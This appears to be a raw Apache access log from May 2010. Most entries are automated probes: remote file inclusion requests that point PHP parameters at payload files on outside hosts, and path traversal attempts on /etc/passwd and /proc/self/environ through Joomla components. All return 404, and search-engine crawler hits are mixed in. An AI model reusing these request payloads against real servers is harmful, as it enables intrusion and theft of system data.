218.48.202.44 - - [20/May/2010:05:00:15 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.13.52 - - [20/May/2010:05:01:35 -0500] "GET /logs/access_log.1218585600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.171.45.253 - - [20/May/2010:05:01:55 -0500] "GET /logs/access_log.1265414400//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
89.171.45.253 - - [20/May/2010:05:01:55 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
89.171.45.253 - - [20/May/2010:05:01:55 -0500] "GET /logs//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:09 -0500] "GET /logs/access_log.1272844800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:10 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:10 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:10 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:10 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:10 -0500] "GET /logs/access_log.1272844800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:18 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:19 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:37 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:37 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:53 -0500] "GET /logs/access_log.1272844800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:02:55 -0500] "GET /logs/access_log.1272844800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:05:03:11 -0500] "GET /logs/access_log.1174348800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [20/May/2010:05:03:39 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt????????????????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:03:40 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt????????????????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:03:40 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt????????????????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:03:50 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt????????????????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:03:50 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt????????????????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:03:50 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt????????????????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.121.16.195 - - [20/May/2010:05:04:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.245.220.19 - - [20/May/2010:05:04:44 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:04:44 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:04:44 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:04:50 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:04:50 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:04:54 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:04:54 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:04:54 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
174.121.16.195 - - [20/May/2010:05:05:20 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
174.121.16.195 - - [20/May/2010:05:05:21 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.121.16.195 - - [20/May/2010:05:05:21 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
178.32.3.34 - - [20/May/2010:05:05:45 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:05:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:05:45 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:05:53 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:05:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:05:53 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.18.200.100 - - [20/May/2010:05:05:54 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
178.32.3.34 - - [20/May/2010:05:06:02 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:06:02 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:06:03 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
216.245.220.19 - - [20/May/2010:05:06:13 -0500] "GET /logs/access_log.1266278400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:06:13 -0500] "GET /logs/access_log.1272067200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:06:19 -0500] "GET /logs/access_log.1272067200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:06:20 -0500] "GET /logs/access_log.1266278400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.195.112.180 - - [20/May/2010:05:06:26 -0500] "GET /logs/access_log.1187827200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.228 - - [20/May/2010:05:06:35 -0500] "GET /logs/access_log.1200700800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.245.220.19 - - [20/May/2010:05:06:36 -0500] "GET /logs/access_log.1270857600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:06:38 -0500] "GET /logs/access_log.1270857600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:07:15 -0500] "GET /logs/access_log.1264982400//bookmark4u/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
207.46.13.95 - - [20/May/2010:05:07:35 -0500] "GET /logs/access_log.1205452800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.245.220.19 - - [20/May/2010:05:07:43 -0500] "GET /logs/access_log.1264982400//bookmark4u/lostpasswd.php?env[include_prefix]=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:05:08:43 -0500] "GET /logs/access_log.1198368000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.112.114.164 - - [20/May/2010:05:09:45 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:05:09:45 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:05:09:46 -0500] "GET /phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:05:09:48 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:05:09:48 -0500] "GET /phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:05:09:48 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.231.60.209 - - [20/May/2010:05:09:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.231.60.209 - - [20/May/2010:05:10:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
178.32.3.34 - - [20/May/2010:05:11:20 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:11:20 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:11:21 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:11:27 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:11:27 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:11:28 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
208.112.114.164 - - [20/May/2010:05:11:32 -0500] "GET /logs/access_log.1262649600/phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:05:11:32 -0500] "GET /logs/access_log.1270512000/phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:05:11:32 -0500] "GET /logs/access_log.1270512000/phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:05:11:33 -0500] "GET /logs/access_log.1262649600/phphtml.php?htmlclass_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.171.45.253 - - [20/May/2010:05:11:40 -0500] "GET /logs/access_log.1263427200//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
178.32.3.34 - - [20/May/2010:05:11:44 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:11:44 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:11:44 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [20/May/2010:05:12:08 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:12:09 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:12:09 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:12:40 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:12:40 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:12:40 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.231.60.209 - - [20/May/2010:05:14:25 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
222.231.60.209 - - [20/May/2010:05:14:25 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.231.60.209 - - [20/May/2010:05:14:26 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
65.18.200.100 - - [20/May/2010:05:15:11 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:15:12 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:15:12 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:05:16:04 -0500] "GET /logs/access_log.1190592000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [20/May/2010:05:17:00 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:17:00 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:17:00 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.46.204.180 - - [20/May/2010:05:17:35 -0500] "GET /logs/access_log.1257984000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.201.194 - - [20/May/2010:05:18:00 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:18:00 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:05:18:00 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.ggpask.com/bbs/skin/pds_uks_down_v2010//setup/x1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
207.46.204.196 - - [20/May/2010:05:18:04 -0500] "GET /logs/access_log.1266451200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.231.60.209 - - [20/May/2010:05:21:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.18.200.100 - - [20/May/2010:05:22:23 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:22:23 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:22:23 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:22:23 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:22:23 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.18.200.100 - - [20/May/2010:05:22:24 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.46.13.139 - - [20/May/2010:05:24:04 -0500] "GET /logs/access_log.1179014400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.55.146.200 - - [20/May/2010:05:24:17 -0500] "GET /logs/access_log.1205107200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
72.55.146.200 - - [20/May/2010:05:24:17 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
72.55.146.200 - - [20/May/2010:05:24:17 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:05:24:21 -0500] "GET /logs/access_log.1212624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.43 - - [20/May/2010:05:25:35 -0500] "GET /artwork/artmaster.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.18.19.146 - - [20/May/2010:05:26:28 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:05:26:28 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:05:26:33 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:05:26:33 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [20/May/2010:05:26:58 -0500] "GET /logs/access_log.1195603200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.231.60.209 - - [20/May/2010:05:27:24 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
222.231.60.209 - - [20/May/2010:05:27:24 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.231.60.209 - - [20/May/2010:05:27:25 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
124.217.229.185 - - [20/May/2010:05:27:46 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [20/May/2010:05:27:47 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [20/May/2010:05:28:22 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [20/May/2010:05:28:22 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.18.19.146 - - [20/May/2010:05:29:26 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.18.19.146 - - [20/May/2010:05:29:33 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.255.243 - - [20/May/2010:05:30:48 -0500] "GET /logs/access_log.1195516800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/May/2010:05:32:16 -0500] "GET /artwork/txt.htm HTTP/1.0" 200 3880 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.142 - - [20/May/2010:05:32:35 -0500] "GET /logs/access_log.1169337600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
